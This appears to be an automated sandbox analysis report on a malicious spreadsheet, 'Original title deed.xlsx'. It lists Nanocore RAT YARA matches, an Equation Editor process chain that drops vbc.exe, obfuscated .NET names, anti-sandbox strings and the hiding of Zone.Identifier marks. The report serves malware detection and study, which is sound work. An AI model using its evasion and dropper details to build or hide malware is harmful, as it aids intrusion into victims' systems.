Source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegSvcs.exe.26a6198.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.26a6198.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegSvcs.exe.26b23d8.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.26b23d8.20.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegSvcs.exe.26a1340.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegSvcs.exe.26a1340.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: nd[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/9@1/2

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028BE2A AdjustTokenPrivileges,	4_2_0028BE2A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028BDF3 AdjustTokenPrivileges,	4_2_0028BDF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C0F0A AdjustTokenPrivileges,	5_2_004C0F0A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C0ED3 AdjustTokenPrivileges,	5_2_004C0ED3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Original title deed.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\rejjFHBZ
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{21f4355e-8257-4e77-8f1b-c822c6ea3cbe}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9185.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Original title deed.xlsx

ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Original title deed.xlsx

Static file information: File size 1859584 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbF source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: {indows\RegSvcs.pdbpdbvcs.pdbE source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2395632648.0000000002090000.00000002.00000001.sdmp, RegSvcs.exe, 00000005.00000002.2597779928.0000000002050000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp

Source: Original title deed.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Original title deed.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B29E87 push cs; retf	4_2_00B29EA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B29477 push cs; ret	4_2_00B29484
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B28A79 push cs; iretd	4_2_00B28BA4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B29E79 push cs; retf	4_2_00B29E84
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00298019 push esp; retf	4_2_0029801A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00296A69 push esp; retf	4_2_00296A6A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0029857F push ecx; ret	4_2_00298585
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005911CE push cs; iretd	4_2_005911D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005911FF push cs; iretd	4_2_0059121A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_0016749C push ecx; ret	5_2_0016749D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_001674A8 push ebp; ret	5_2_001674A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_00169880 push ecx; retf 0016h	5_2_001698A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_00169D1C push eax; retf	5_2_00169D1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_00169D20 pushad ; retf	5_2_00169D21
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_00165E25 push esp; retf	5_2_00165E26

Source: initial sample

Static PE information: section name: .text entropy: 7.96059480846

Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Original title deed.xlsx

Stream path 'EncryptedPackage' entropy: 7.99989686395 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2636, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
